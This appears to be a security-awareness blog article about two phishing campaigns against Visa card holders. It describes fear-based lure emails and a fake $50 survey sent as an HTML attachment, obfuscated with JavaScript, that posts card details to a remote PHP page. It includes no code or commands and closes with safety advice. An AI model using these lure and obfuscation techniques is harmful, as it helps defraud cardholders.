Phishing raids aiming at Visa® card holders multiply

Visa® card users have been the target of two major drive-by phishing campaigns during the week-end. While the former phishing wave only addresses Visa® users located in France and relies on a forged login page hosted on a spoofed domain, the latter scheme is much more elaborated and carefully planned.

In order to lure victims into filling in the form, the drive-by spam message they receive warns them that failure to comply with the request would lead to the automatic termination of the service and, subsequently, the deactivation of the card account. The cyber-criminals behind this kind of attacks usually rely on users' fear of losing service to force them into disclosing sensitive details.

While the first phishing attempt abusing the Visa® brand is frequently encountered and relatively easy to stop (mostly by terminating the services of the Web site hosting the spoofed Web page), the following example is much more difficult to spot and block in due time.

This specific phishing campaign also relies on drive-by spam in order to reach its victims. It is addressed to any Visa® user who would like to shoot a $50 bonus in exchange of filling in an apparently harmless survey. Unlike average phishing attempts, this message does not include any Web links, which makes it less likely to be labeled as spam or to raise any suspicion amongst its recipients. Instead, it comes with an alleged survey form attached as a HTML document - the actual phishing form.

Although the e-mail message is written in poor English (there are quite a few spelling errors and ambiguous sentences) that may tip the user that it has not been composed by Visa®, the HTML attachment is quite convincing and extremely well protected against source-code analysis. When opened, the HTML page looks normally, with all of the form fields in place and ready to harvest sensitive details:

The first questions are typical to a survey and bring nothing to the remote attacker; they are there just to add extra legitimacy to the form. On the contrary, the second part of the survey is quite interesting, since it is meant to steal users' personal information such as the full name, full address and contact information. The last part of the alleged survey asks for the credit card number, verification number and the expiration date - paired with the victim's address, these are the three key details that open the door for on-line shopping on the victim's behalf.

Should the victim happen to know HTML and would rather see with their very eyes what happens when the Submit button is pressed, he / she will be presented with an encrypted view of the page, as shown below:

The entire HTML page has been obfuscated with the JavaScript escape function in order to hide the inner workings of the form from the average computer users. Since most modern browsers can work with JavaScript (unless they have explicitly limited the use of JavaScript), the page will be decoded and rendered in real time as the victim opens it inside their favorite browser. Digging deeper past the obfuscation routine, the HTML code reveals that the form's content is actually posted to a PHP page hosted on a server belonging to the China Beijing Chinanet Shanghai Province Network.

Unlike remotely-hosted phishing forms (that can be taken down by service providers as soon as they have been identified as malicious), attached forms are much more difficult to stop, since users always have them available as e-mail attachments.

In order to stay safe and protect the integrity of your account, never open attachments from unknown persons, especially when they appear to be sent on the behalf of a financial institution. Most banks would contact their customers via phone and - if necessary - would invite them to the nearest subsidiary if account modifications or updates are required.